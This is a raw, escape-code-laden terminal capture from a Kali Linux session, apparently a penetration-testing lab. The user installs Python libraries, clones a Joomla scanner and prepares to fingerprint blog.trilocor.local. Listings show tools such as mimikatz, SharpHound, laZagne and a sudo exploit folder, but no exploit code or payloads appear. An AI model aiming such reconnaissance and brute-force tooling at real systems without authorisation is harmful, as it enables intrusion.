urllib3#[K#[115C[8:22:37]#[0m#[143D######[24m#[32mp#[24m#[32mi#[24m#[32mp#[39m#[24m
#[39m i#[39mn#[39ms#[39mtall ur#[2Cib3 #[24D
#[J#[0;1;2mcommand#[0m
#[J#[0mpip #[Jpip3 #[Jpip3.11 #[Jpipal
#[Jpipesz #[Jpipewire #[Jpipewire-aes67 #[Jpipewire-avb
#[Jpipewire-pulse#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpip#[39m install urllib3#[K#[120C[8:22:37]#[0m#[148D
#[J#[0;1;2mcommand#[0m
#[J#[0mpip #[Jpip3 #[Jpip3.11 #[Jpipal
#[Jpipesz #[Jpipewire #[Jpipewire-aes67 #[Jpipewire-avb
#[Jpipewire-pulse#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpip#[39m install urllib3#[K#[120C[8:22:37]#[0m#[148D#[?1l#>#[?2004l
#[J#[A#[6C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m937#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:22:57]#[148D#[?1h#=#[?
2004hp#pip install certifi#[19D#[7mp#[7mi#[7mp#[7m
#[7mi#[7mn#[7ms#[7mt#[7ma#[7ml#[7ml#[7m
#[7mc#[7me#[7mr#[7mt#[7mi#[7mf#[7mi#[27m#[19D#[27mp#[27mi#[27mp#[27m
#[27mi#[27mn#[27ms#[27mt#[27ma#[27ml#[27ml#[27m
#[27mc#[27me#[27mr#[27mt#[27mi#[27mf#[27mi#[19D#[32mp#[32mi#[32mp#[39m#[16C#[?
1l#>#[?2004l
#[J#[A#[25C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m938#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:23:05]#[148D#[?1h#=#[?
2004hp#pip install bs4#[15D#[7mp#[7mi#[7mp#[7m
#[7mi#[7mn#[7ms#[7mt#[7ma#[7ml#[7ml#[7m
#[7mb#[7ms#[7m4#[27m#[15D#[27mp#[27mi#[27mp#[27m
#[27mi#[27mn#[27ms#[27mt#[27ma#[27ml#[27ml#[27m
#[27mb#[27ms#[27m4#[15D#[32mp#[32mi#[32mp#[39m#[12C#[?1l#>#[?2004l
#[J#[A#[21C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m939#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:23:12]#[148D#[?1h#=#[?
2004hc##[1m#[31mc#[0m#[39m##[1m#[31mc#[0m#[39m#[90md joomla-
bruteforce#[39m#[19D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaclock cacaplay cacaview
cadaver calc_stat callgrind_control
cardos-tool catdoc catman cbfstool cc
ccache2john cd-create-profile cd-fix-profile
cd-iccdump cftp3 cg_annotate cg_diff cg_merge
check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cifsiostat cisco-decrypt
ckbcomp clang++-15 clang++-16 cluster cmedb colcrt
colormgr colrm
column comm compress convert count-14 count-
15 count-16 coveralls
cp cpan cpanel_json_xs cpgr cpio
cracf2john cracklib-check cracklib-unpacker
crackmapexec create-cracklib-dict createdb createlang cron
cryptcat cryptoflex-tool cupsctl
cupsdisable cupsenable cupstestppd curl cvtsudoers cython3
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mc#[0m#[39m#[90md joomla-
bruteforce#[39m#[K#[119C[8:23:12]#[0m#[147D##[1m#[31mc#[1m#[31md#[0m#[39m###[0m#[32
mc#[0m#[32md#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m joomla-
bruteforce#[39m#[K#[119C[8:23:12]#[0m#[146D###[32mc#[32md#[32m #[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34m.git#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m.#[24m#[90m./#[39m#[K#[133C[8:23:12]#[0m#[144D##[4m.#[39m#[4m.#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mchisel#[0m/ #[J#[01;34mCVE-2021-3156#[0m/
#[J#[01;34mfirefox_decrypt#[0m/ #[J#[01;34mjoomlavs#[0m/
#[J#[01;34mLigolo-ng#[0m/ #[J#[01;34mRPCScan#[0m/
#[J#[01;34msubbrute#[0m/ #[J#[01;34mwindapsearch#[0m/
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../#[24m#[K#[133C[8:23:12]#[0m#[142D#[?1l#>#[?2004l
#[J#[A#[12C
#[J#]2;cd ../##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools##]1;~/Tools##]7;file:///home/kali/Tools#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m940#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:23:41]#[148D#[?1h#=#[?
2004hg#gh repo clone drego85/JoomlaScan#[32D#[7mg#[7mh#[7m #[7mr#[7me#[7mp#[7mo#[7m
#[7mc#[7ml#[7mo#[7mn#[7me#[7m
#[7md#[7mr#[7me#[7mg#[7mo#[7m8#[7m5#[7m/#[7mJ#[7mo#[7mo#[7mm#[7ml#[7ma#[7mS#[7mc#[7
ma#[7mn#[27m#[32D#[27mg#[27mh#[27m #[27mr#[27me#[27mp#[27mo#[27m
#[27mc#[27ml#[27mo#[27mn#[27me#[27m
#[27md#[27mr#[27me#[27mg#[27mo#[27m8#[27m5#[27m/#[27mJ#[27mo#[27mo#[27mm#[27ml#[27m
a#[27mS#[27mc#[27ma#[27mn#[32D#[1m#[31mg#[1m#[31mh#[0m#[39m#[30C
#[J#[A#[6Cw##[32mw#[39m##[32mw#[39m#[90mhatweb blog.trilocor.local#[39m#[26D
#[J#[0;1;2mcommand#[0m
#[0mw w3m w3mman wafw00f
wait waitpid wall wamp
wapiti wapiti-getcookie wash watch
watchgnupg wc wce wdctl
weave webfuzz webpack webpack-cli
webquiz web_search webshells websockify
weevely wesside-ng westcos-tool wfuzz
wget whatis whatweb whence
where whereis which which-command
which.debianutils while whiptail whirlpooldeep
who whoami whois widget
wifite wiki #[01;34mwindapsearch#[0m/ windows-binaries
windows-resources winexe wipefs wireplumber
wireshark wish wish8.6 wofm2opl
wolframalpha wopl2ofm word-list-compress wordlists
wordview work_in_progress wovf2ovp wovp2ovf
wpa_action wpaclean wpa_cli wpa_passphrase
wpapcap2john wpa_supplicant wpctl wpexec
wpp wps wpscan wpspdf
write wrjpgcom wscat wsdump
#[Jwsrep_sst_backup #[Jwsrep_sst_common #[Jwsrep_sst_mariabackup
#[Jwsrep_sst_mysqldump #[Jwsrep_sst_rsync #[Jwsrep_sst_rsync_wan #[Jwww-
browser #[J #[12A#[0m#[27m#[24m#[0m
#[6C#[32mw#[39m#[90mhatweb
blog.trilocor.local#[39m#[K#[112C[8:23:41]#[0m#[147D##[32mw#[32mh#[39m###[1m#[31mw#
[1m#[31mh#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mwhatis #[Jwhatweb #[Jwhence #[Jwhere #[Jwhereis #[Jwhich #[Jwhich-
command #[Jwhich.debianutils #[Jwhile #[Jwhiptail #[Jwhirlpooldeep #[Jwho
#[Jwhoami #[Jwhois #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mwh#[0m#[39m#[90matweb
blog.trilocor.local#[39m#[K#[112C[8:23:41]#[0m#[146D###[1m#[31mw#[1m#[31mh#[1m#[31m
a#[0m#[39m#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mcommand#[0m
#[0mwhatis whatweb
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103mwhat#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mwha#[0m#[39m#[90mtweb
blog.trilocor.local#[39m#[K#[112C[8:23:41]#[0m#[145D##[1m#[31ma#[1m#[31mt#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mwhatis #[Jwhatweb#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mwhat#[0m#[39m#[90mweb
blog.trilocor.local#[39m#[K#[112C[8:23:41]#[0m#[144D##[1m#[31mt#[1m#[31mi#[0m#[39m#
[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[22D
#[J#[0;1;2mcommand#[0m
#[J#[0mwhatis#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mwhati#[0m#[39m#[K#[134C[8:23:41]#[0m#[143D##[1m#[31mi#[1m#[31ms#[0m#[3
9m#######[0m#[32mw#[0m#[32mh#[0m#[32ma#[0m#[32mt#[0m#[32mi#[0m#[32ms#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mwhatis#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mwhatis#[39m#[K#[133C[8:23:41]#[0m#[142D##[32ms#[32m #[39m
#[J#[A#[13C###[32ms#[39m#[39m
#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[A#[15C
#]2;kali@kali:~/Tools##]1;~/Tools##]7;file:///home/kali/Tools#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m941#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:24:04]#[148D#[?1h#=#[?
2004hg#gh repo clone drego85/JoomlaScan#[32D#[7mg#[7mh#[7m #[7mr#[7me#[7mp#[7mo#[7m
#[7mc#[7ml#[7mo#[7mn#[7me#[7m
#[7md#[7mr#[7me#[7mg#[7mo#[7m8#[7m5#[7m/#[7mJ#[7mo#[7mo#[7mm#[7ml#[7ma#[7mS#[7mc#[7
ma#[7mn#[27m#[32D#[27mg#[27mh#[27m #[27mr#[27me#[27mp#[27mo#[27m
#[27mc#[27ml#[27mo#[27mn#[27me#[27m
#[27md#[27mr#[27me#[27mg#[27mo#[27m8#[27m5#[27m/#[27mJ#[27mo#[27mo#[27mm#[27ml#[27m
a#[27mS#[27mc#[27ma#[27mn#[32D#[1m#[31mg#[1m#[31mh#[0m#[39m##
#[0;1;2mcommand#[0m
#[J#[0mghh #[Jghostscript#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mgh#[0m#[39m repo clone
drego85/JoomlaScan#[K#[107C[8:24:04]#[0m#[148D#[1C
#[J#[0;1;2mcommand#[0m
#[J#[0mghh #[Jghostscript#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mgh#[0m#[39m repo clone
drego85/JoomlaScan#[K#[107C[8:24:04]#[0m#[147D#[1C
#[J#[0;1;2mcommand#[0m
#[J#[0mghh #[Jghostscript#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mgh#[0m#[39m repo clone
drego85/JoomlaScan#[K#[107C[8:24:04]#[0m#[146D###[1m#[31mg#[0m#[39m#[0m#[39m repo
clone drego85/JoomlaScan
#[31D##[0m#[32mg#[39m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m
#[J#[0;1;2mcommand#[0m
#[0mg++-13 galera_recovery gapplication gatttool gawk
gawkbug gbak gc
gcc-ar-13 gcc-nm gcov-dump-13 gcov-tool-13 gcr-viewer
gdebi-gtk gdialog gdisk
gdk-pixbuf-csource genccode gendesc gendict
generic_chunked generic_send_tcp genmkvpwd genpng
getcifsacl get-iab getpcaps getty gftodvi
gids-tool gm gnome-disks
gnome-text-editor gopherd gpg gpg-wks-server gpg-zip
gpic gpp-decrypt gpre
gprof gprofng groupadd groupdel grub-glue-
efi grub-install grub-kbdcomp grub-mkfont
grub-mkimage grub-probe grub-render-label gs gslj
gslp gsnd gspath
gtf gtk4-broadwayd gtk4-builder-tool gtscompare gtstemplate
guymager gvmd gvm-manage-certs
gvpack gvpr gwenview_importer gxl2dot gxl2gv
gyp
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[32mg#[39m repo clone
drego85/JoomlaScan#[K#[108C[8:24:04]#[0m#[147D##[32mg#[32mi#[39m repo clone
drego85/JoomlaScan#[30D###[1m#[31mg#[1m#[31mi#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[0mgids-tool gie gignore gignored
ginstall-info gio gio-querymodules
git git_commits_ahead git_commits_behind git_current_branch
git_current_user_email git_current_user_name git_develop_branch
gitdiff gitdiffview github git_main_branch
git_prompt_ahead git_prompt_behind git_prompt_info
git_prompt_long_sha git_prompt_remote git_prompt_short_sha git_prompt_status
git-receive-pack git_remote_status git_repo_name
#[Jgit-shell #[Jgit-svn-dcommit-push #[Jgit-upload-archive #[Jgit-
upload-pack #[Jgivero #[J
#[6A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mgi#[0m#[39m repo clone
drego85/JoomlaScan#[K#[107C[8:24:04]#[0m#[146D###[1m#[31mg#[1m#[31mi#[1m#[31mt#[0m#
[39m repo clone drego85/JoomlaScan#[30D####[0m#[32mg#[0m#[32mi#[0m#[32mt#[39m
#[J#[0;1;2mcommand#[0m
#[0mgit git_commits_ahead git_commits_behind
git_current_branch git_current_user_email git_current_user_name
git_develop_branch
gitdiff gitdiffview github git_main_branch
git_prompt_ahead git_prompt_behind git_prompt_info
git_prompt_long_sha git_prompt_remote git_prompt_short_sha git_prompt_status
git-receive-pack git_remote_status git_repo_name
#[Jgit-shell #[Jgit-svn-dcommit-push #[Jgit-upload-archive #[Jgit-
upload-pack #[J
#[5A#[0m#[27m#[24m#[0m
#[6C#[32mgit#[39m repo clone
drego85/JoomlaScan#[K#[106C[8:24:04]#[0m#[145D##[32mt#[32mh#[39m repo clone
drego85/JoomlaScan#[30D#####[1m#[31mg#[1m#[31mi#[1m#[31mt#[1m#[31mh#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mgithub#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mgith#[0m#[39m repo clone
drego85/JoomlaScan#[K#[105C[8:24:04]#[0m#[144D##[1m#[31mh#[1m#[31mu#[0m#[39m repo
clone drego85/JoomlaScan#[30D
#[J#[0;1;2mcommand#[0m
#[J#[0mgithub#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mgithu#[0m#[39m repo clone
drego85/JoomlaScan#[K#[104C[8:24:04]#[0m#[143D##[1m#[31mu#[1m#[31mb#[0m#[39m repo
clone
drego85/JoomlaScan#[30D#######[0m#[32mg#[0m#[32mi#[0m#[32mt#[0m#[32mh#[0m#[32mu#[0m
#[32mb#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mgithub#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mgithub#[39m repo clone
drego85/JoomlaScan#[K#[103C[8:24:04]#[0m#[142D##[32mb#[32m #[39m repo clone
drego85/JoomlaScan#[30D
#[J#[A#[13C###[32mb#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[01;34mchisel#[0m/ #[01;34mCVE-2021-3156#[0m/ #[01;34mfirefox_decrypt#[0m/
#[01;34mjoomla-bruteforce#[0m/ #[01;34mjoomlavs#[0m/ #[01;34mLigolo-ng#[0m/
#[01;34mRPCScan#[0m/ #[01;34msubbrute#[0m/ #[01;34mwindapsearch#[0m/
#[0;1;2mfile#[0m
#[01;32mfirefox_decrypt.py#[0m* laZagne.py #[01;32mlinpeas.sh#[0m*
#[01;32mLinuxPrivChecker.sh#[0m* #[01;32mLinuxSmartEnumeration.sh#[0m*
mimikatz.exe #[01;32mnc64.exe#[0m* #[01;32mnmap#[0m* #[01;32mpspy64#[0m*
rubeus.exe
#[J#[01;32mSessionGopher.ps1#[0m* #[JSharpHound.exe #[JSharpHound.ps1 #[J
#[5A#[0m#[27m#[24m#[0m
#[6C#[32mgithub#[39m repo clone drego85/JoomlaScan#[K#[102C[8:24:04]#[0m#[141Drepo
clone drego85/JoomlaScan #[31D
#[J#[0;1;2mcommand#[0m
#[J#[0mgithub#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mgithub#[39m repo clone drego85/JoomlaScan#[K#[103C[8:24:04]#[0m#[142D#[?
1l#>#[?2004l
#[J#[A#[12C
#]2;kali@kali:~/Tools##]1;~/Tools##]7;file:///home/kali/Tools#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m942#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:24:20]#[148D#[?1h#=#[?
2004hc##[4mc#[24m##[4mc#[24m#[90md
../#[39m######[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaclock cacaplay cacaview
cadaver calc_stat callgrind_control
cardos-tool catdoc catman cbfstool cc
ccache2john cd-create-profile cd-fix-profile
cd-iccdump cftp3 cg_annotate cg_diff cg_merge
check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cifsiostat cisco-decrypt
ckbcomp clang++-15 clang++-16 cluster cmedb colcrt
colormgr colrm
column comm compress convert count-14 count-
15 count-16 coveralls
cp cpan cpanel_json_xs cpgr cpio
cracf2john cracklib-check cracklib-unpacker
crackmapexec create-cracklib-dict createdb createlang cron
cryptcat cryptoflex-tool cupsctl
cupsdisable cupsenable cupstestppd curl cvtsudoers cython3
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[4mc#[24m#[90md
../#[39m#[K#[133C[8:24:20]#[0m#[147D##[4mc#[39m#[4md#[24m###[24m#[32mc#[24m#[32md#[
39m
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m ../#[39m#[K#[133C[8:24:20]#[0m#[146D###[32mc#[32md#[32m #[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mchisel#[0m/ #[J#[01;34mCVE-2021-3156#[0m/
#[J#[01;34mfirefox_decrypt#[0m/ #[J#[01;34mjoomla-bruteforce#[0m/
#[J#[01;34mjoomlavs#[0m/ #[J#[01;34mLigolo-ng#[0m/ #[J#[01;34mRPCScan#[0m/
#[J#[01;34msubbrute#[0m/ #[J#[01;34mwindapsearch#[0m/
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[90m../#[39m#[K#[133C[8:24:20]#[0m#[145D#[39m.##[4m.#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34m2024-05-02-ZAP-Report-#[0m/ #[J#[01;34m2024-05-02-ZAP-Report-2#[0m/
#[J#[01;34m2024-05-02-ZAP-Report-3#[0m/ #[J#[01;34mCPTS#[0m/ #[J#[01;34mCTF#[0m/
#[J#[01;34mDesktop#[0m/ #[J#[01;34mDownloads#[0m/ #[J#[01;34mSQLiteStudio#[0m/
#[J#[01;34m 模板#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../#[24m#[K#[133C[8:24:20]#[0m#[142D##[4m/#[4mD#[24m#[90mANTE-
NIX07#[39m#[10D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mDesktop#[0m/ #[J#[01;34mDownloads#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../D#[24m#[90mANTE-
NIX07#[39m#[K#[122C[8:24:20]#[0m#[141D##[4mD#[39m#[4mo#[24m#[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[9D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mDownloads#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Do#[24m#[K#[131C[8:24:20]#[0m#[140D##[4mo#[4mw#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mDownloads#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Dow#[24m#[K#[130C[8:24:20]#[0m#[139D##[4mw#[4mn#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mDownloads#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Down#[24m#[K#[129C[8:24:20]#[0m#[138D
#[J#[A#[16C##[4mn#[4mloads#[1m#[4m/#[0m#[24m
#[J#[A#[21C
#[J#]2;cd ../Downloads##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Downloads##]1;~/Downloads##]7;file:///home/kali/Downloads#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Downloads#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m943#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:24:37]#[148D#[?1h#=#[?
2004hl##[32ml#[39m##[32ml#[39m#[90ms#[39m##[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mlaudanum ld ldapdelete
lefty lesskey
libsixel-config light-locker line_send_tcp
linguist lion2john
llvm-cvtres-14 llvm-cvtres-15 llvm-cvtres-16
llvm-gsymutil-14 llvm-gsymutil-15
llvm-gsymutil-16 llvm-install-name-tool-14 llvm-install-name-tool-15
llvm-install-name-tool-16 llvm-jitlink-executor-14
llvm-jitlink-executor-15 llvm-jitlink-executor-16 llvm-lto-14
llvm-lto-15 llvm-lto-16
llvm-modextract-14 llvm-modextract-15 llvm-modextract-16
llvm-nm-14 llvm-nm-15
llvm-nm-16 llvm-otool-14 llvm-otool-15
llvm-otool-16 llvm-symbolizer-14
llvm-symbolizer-15 llvm-symbolizer-16 ln
lnstat localectl
locale-gen lofromtemplate login
loginctl lotus2john
lowriter lp lpmove
lp_solve ls
lsblk lspgpot lwp-dump
lwp-request lzegrep
lzless
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32ml#[39m#[90ms#[39m#[K#[137C[8:24:37]#[0m#[147D##[32ml#[32ms#[39m
#[J#[0;1;2mcommand#[0m
#[0mls lsa lsar lsassy lsattr lsblk lsb_release lscpu lsdiff
lsfd lsinitramfs lsipc lsirq lslocks lslogins lsmem lsmod lsmtd
#[Jlsns #[Jlsof #[Jlspci #[Jlspgpot #[Jlspower #[Jlstopo #[Jlstopo-no-
graphics #[Jlsusb #[J
#[3A#[0m#[27m#[24m#[0m
#[6C#[32mls#[39m#[K#[137C[8:24:37]#[0m#[146D#[?1l#>#[?2004l
#[J#[A#[8C
#]2;kali@kali:~/Downloads##]1;~/Downloads##]7;file:///home/kali/Downloads#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Downloads#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m944#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:24:37]#[148D#[?1h#=#[?
2004hu##[1m#[31mu#[0m#[39m##[1m#[31mu#[0m#[39m#[90mnzip ../Downloads/SharpHound-
v2.3.3.zip#[39m#[39D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0muaf2john ubidetach ubihealthd
ubimkvol ubirmvol
ubirsvol ubiscan ubiupdatevol
ucfq ucfr
uclampset udevadm udisksctl
ul uncompress
unibrow UnicodeNameMappingGenerator-15
UnicodeNameMappingGenerator-16 unicorn-magic unique
unpack200 unrar unshadow
unshare unsquashfs
unzip update-catalog updatedb.plocate
update-default-ispell update-desktop-database
update-dictcommon-aspell update-dictcommon-hunspell update-fonts-dir
update-fonts-scale update-grub
update-gsfontmap update-ieee-data update-initramfs
update-java-alternatives update-language-lua
update-mime update-passwd update-pciids
update-shells update-tl-stacked-conffile
updmap updmap-user upgrade-from-grub-legacy
upmendex uppltotf
upx-ucl urlscan us
usb-devices usermod
utmpdump
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mu#[0m#[39m#[90mnzip ../Downloads/SharpHound-
v2.3.3.zip#[39m#[K#[99C[8:24:37]#[0m#[147D##[1m#[31mu#[1m#[31mn#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[0munafs unalias uname
unar unbuffer uncompress uncompress.real
undrop unexpand unflatten
unfunction unhash unibrow unicfgtst
UnicodeNameMappingGenerator-15 UnicodeNameMappingGenerator-16 unicode_start
unicode_stop unicorn-magic unicornscan uninstall_oh_my_zsh
uniq unique unix2dos
unix2mac unix_chkpwd unix-privesc-check unix_update
unlimit unlink unlzma
unmkinitramfs unopkg unpack200 unrar
unrar-nonfree unset unsetopt
unshadow unshare unsquashfs until
#[Junwrapdiff #[Junxz #[Junzip
#[Junzipsfx #[Junzstd #[J
#[8A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mun#[0m#[39m#[90mzip ../Downloads/SharpHound-
v2.3.3.zip#[39m#[K#[99C[8:24:37]#[0m#[146D###[1m#[31mu#[1m#[31mn#[1m#[31mz#[0m#[39m
##[1m#[31mz#[1m#[31mi#[0m#[39m#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mcommand#[0m
#[0munzip unzipsfx
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103munzip#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[1m#[31munzi#[0m#[39m#[90mp ../Downloads/SharpHound-
v2.3.3.zip#[39m#[K#[99C[8:24:37]#[0m#[144D##[1m#[31mi#[1m#[31mp#[0m#[39m######[0m#[
32mu#[0m#[32mn#[0m#[32mz#[0m#[32mi#[0m#[32mp#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0munzip #[Junzipsfx#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32munzip#[39m#[90m ../Downloads/SharpHound-
v2.3.3.zip#[39m#[K#[99C[8:24:37]#[0m#[143D##[32mp#[32m #[39m
#[J#[A#[12C###[32mp#[39m#[39m
#[J#[0;1;2mzip file#[0m
#[J#[01;31mJoomlaScan-master.zip#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32munzip#[39m #[90m../Downloads/SharpHound-
v2.3.3.zip#[39m#[K#[99C[8:24:37]#[0m#[142D#[39mJ#[39m #[39m #[39m #[39m #[39m #[39m
